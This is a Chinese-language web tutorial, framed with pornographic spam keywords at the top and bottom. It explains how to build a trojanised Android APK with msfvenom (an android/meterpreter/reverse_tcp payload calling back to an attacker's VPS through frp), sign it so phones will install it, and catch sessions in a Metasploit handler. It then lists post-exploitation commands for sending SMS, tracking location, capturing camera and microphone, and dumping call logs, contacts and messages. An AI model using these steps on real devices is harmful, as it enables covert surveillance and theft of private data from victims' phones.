国产成人精品18p,天天干成人网,无码专区狠狠躁天天躁,美女脱精光隐私扒开免费观看

通過(guò)Metasploit怎么遠程控制Android設備

發(fā)布時(shí)間:2021-09-14 11:25 來(lái)源:億速云 閱讀:0 作者:Leah 欄目: 網(wǎng)絡(luò )安全

通過(guò)Metasploit怎么遠程控制Android設備,相信很多沒(méi)有經(jīng)驗的人對此束手無(wú)策,為此本文總結了問(wèn)題出現的原因和解決方法,通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

Android系統下使用的Metasploit模塊

如下圖,可以看到有這幾種可以在A(yíng)ndroid下使用的payload:

端口映射方案

如果我們的手機與攻擊者所使用的計算機處在同一局域網(wǎng),受害者的手機可以直接訪(fǎng)問(wèn)到攻擊者的電腦,也就不需要端口映射了??墒乾F實(shí)中,絕大多數情況是,受害者的手機位于外網(wǎng)或者與攻擊者處于不同的內網(wǎng),而攻擊者的電腦處于令一個(gè)內網(wǎng)環(huán)境,此時(shí),受害者的手機無(wú)法直接訪(fǎng)問(wèn)到攻擊者的電腦,那么就需要進(jìn)行端口映射了,即將攻擊者的端口映射到位于公網(wǎng)的上面去,這樣,受害者的手機通過(guò)訪(fǎng)問(wèn)公網(wǎng)vps就可以間接的訪(fǎng)問(wèn)處于內網(wǎng)的攻擊者的電腦。

更簡(jiǎn)單的一個(gè)解決方法:既然都有vps了,為啥不直接用vps當攻擊機呢?可以直接在vps上面安裝metasploit,生成木馬并直接控制受害者的手機,這多簡(jiǎn)單。但這里我們還是用端口映射的方法。

frp

我們先用frp工具來(lái)實(shí)現端口映射,利用處在內網(wǎng)的攻擊機kali實(shí)現對處在外網(wǎng)的Android機器的入侵。

實(shí)驗環(huán)境:

  • 目標Android設備

  • 公網(wǎng)vps(centos)

  • 內網(wǎng)攻擊機kali

主思路是:

  • 公網(wǎng)vps運行frp server

  • 本地kali運行frp client

  • 將kali本地端口映射到公網(wǎng)vps

1. VPS 服務(wù)端:

將vps作為frp服務(wù)端,執行./frps -c ./frps.ini,服務(wù)端的配置 frps.ini 如下:

[common]
bind_port = 7000   # 這是默認的,改不改皆可

2. 客戶(hù)端:

將內網(wǎng)攻擊機kali作為frp客戶(hù)端,客戶(hù)端的配置 frps.ini 如下:

[common]
server_addr = 39.xxx.xxx.210  # 這里是公網(wǎng)vps的ip
server_port = 7000          # 這里的端口要跟服務(wù)端的一樣

[msf]
type = tcp
local_ip = 127.0.0.1        
local_port = 4444          # 將到達frp的數據轉發(fā)給本地的4444端口
remote_port = 2333         # 服務(wù)端的2333端口轉發(fā)給本地

客戶(hù)端通過(guò)vps的IP和7000監聽(tīng)端口建立連接,把公網(wǎng)的2333端口數據傳遞給本地的4444端口。

配置完,執行./frpc -c ./frpc.ini啟動(dòng)客戶(hù)端:

到這里frp就配置完了,接下來(lái)就是要生成木馬了。

Metasploit生成木馬

用Metasploit生成載有惡意Payload的Android的apk。在Kali Linux里面打開(kāi)一個(gè)新的窗口輸入:

msfvenom -p android/meterpreter/reverse_tcp LHOST=39.xxx.xxx.210(vps公網(wǎng)ip) LPORT=2333(公網(wǎng)) R > shell.apk

為apk應用簽名

我們已經(jīng)成功創(chuàng )建了Android格式(APK)文件的有效載荷。但是,現在一般Android的移動(dòng)設備不允許安裝沒(méi)有適當簽名ssl/' target='_blank'>證書(shū)的應用程序。 Android設備只安裝帶有簽署文件的APK。我們可以使用如下工具進(jìn)行手動(dòng)簽名:

Keytool
JARsigner
zipalign

這3個(gè)軟件,Kali中內置了前2個(gè),第3個(gè)需要安裝(在新版kali中,JARsigner也需要自己安裝apt-get install openjdk-13-jdk-headless)

第一步使用keytool生成一個(gè)key文件。會(huì )讓你輸入該key的名稱(chēng)、單位、地址等等信息,最終生成一個(gè)key文件

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

上面問(wèn)你的東西隨便填就行,但是要注意,最后不要輸入yes要輸y,不然會(huì )一直詢(xún)問(wèn)。

如下圖,生成一個(gè)key文件:

第二步:使用該key文件配合JARsigner為APK簽名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore shell.apk alias_name

第三步:然后使用JARsigner驗證簽名

jarsigner -verify -verbose -certs shell.apk

到此為止,就完成了簽名過(guò)程,此shell.apk就可以在A(yíng)ndroid中使用了。

開(kāi)啟Metasploit進(jìn)行監聽(tīng)

使用metasploit監聽(tīng)本地接受數據的端口

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp 
set LHOST 127.0.0.1
set LPORT 4444
exploit

然后將載有payload的APK發(fā)送到手機上安裝并啟動(dòng),此時(shí),msf上面就可以得到手機的一個(gè)session了:

這里,有的手機得到的session一會(huì )兒自動(dòng)斷開(kāi),不知道為什么,我自己想了個(gè)解決辦法是:剛一獲得session就馬上執行 webcam_stream 開(kāi)啟遠程視頻,之后斷開(kāi)視頻就可以了,session就穩定了,不會(huì )再斷開(kāi)了,不知道為什么!

在我們獲取了目標Android手機的Meterpreter權限之后,我們可以執行如下命令進(jìn)行后滲透攻擊

后滲透攻擊

查看手機是否root過(guò)

check_root

控制目標手機發(fā)送短信

send_sms -d 某個(gè)手機號碼 -t "hello"

查看系統信息

sysinfo

對手機進(jìn)行定位

wlan_geolocate       // 使用WLAN信息獲取當前地理位置
geolocate            // 利用地理定位(GPS)獲取當前LAT

此命令會(huì )輸出手機的經(jīng)緯度,我們根據這個(gè)經(jīng)緯度就可以知道手機的具體位置;還有一個(gè)網(wǎng)址,打開(kāi)網(wǎng)址就會(huì )顯示手機在谷歌地圖中的位置。但是這個(gè)網(wǎng)址要科學(xué)上網(wǎng),所以我們可以直接在谷歌地球上定位這個(gè)經(jīng)緯度:

準確度沒(méi)得說(shuō)了,精確到樓號。(以上經(jīng)緯度為geolocate獲?。?/p>

調用手機攝像頭

webcam_list      // 列出網(wǎng)絡(luò )攝像頭
webcam_snap 1/2
webcam_chat      // 開(kāi)始視頻聊天
webcam_snap      // 從指定的攝像頭獲取快照
webcam_stream -i 1      // 從指定的網(wǎng)絡(luò )攝像頭播放視頻流

調用麥克風(fēng)

record_mic -d x      // 從默認麥克風(fēng)錄制音頻為X秒

此命令默認錄制默認麥克風(fēng)錄制1秒鐘的音頻,并將嘗試不帶精度的參數來(lái)播放捕獲的音頻wav文件。

獲取通訊記錄信息

dump_calllog      // 下載目標手機上的通話(huà)記錄
dump_contacts     // 獲取聯(lián)系人列表
dump_sms         // 獲取短信

如上圖,將通訊記錄,聯(lián)系人列表和短信都保存到了攻擊者本地文件中了

來(lái)個(gè)比較有意思的?,F在讓我遠程強制修改我手機的壁圖案。繼續輸入命令如下:

msf > use post/multi/manage/set_wallpaper
msf post (set_wallpaper)>set WALLPAPER_FILE  /root/5.jpg
msf post (set_wallpaper)>set session 1
msf post (set_wallpaper)>exploit

5.jpg如下:

執行模塊并成功更換:

更多命令如下:

execute 執行一個(gè)命令 
getuid 獲取當前運行的用戶(hù) 
localtime 顯示目標系統的本地日期和時(shí)間 
pgrep 按名稱(chēng)篩選進(jìn)程 
ps 列出正在運行的進(jìn)程

用戶(hù)界面命令
=============================== 
screenshare  實(shí)時(shí)監視遠程用戶(hù)的桌面
screenshot  抓取交互式桌面的屏幕截圖

音頻輸出命令
=============================
play       在目標系統上播放波形音頻文件(.wav)

應用程序控制器命令
===============================
app_install   請求安裝apk文件
app_list     列出設備中已安裝的應用程序
app_run      啟動(dòng)包名稱(chēng)的主活動(dòng)
app_uninstall 請求卸載apk文件

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng )、來(lái)自互聯(lián)網(wǎng)轉載和分享為主,文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權請聯(lián)系QQ:712375056 進(jìn)行舉報,并提供相關(guān)證據,一經(jīng)查實(shí),將立刻刪除涉嫌侵權內容。

精品无码国产污污污免费网站国产 | 日韩成人无码一区二区三区| 女人的精水喷出来视频| 国产免费无遮挡吸乳视频在线观看| 国产亚洲人成在线播放| 久久精品国产亚洲AV大全|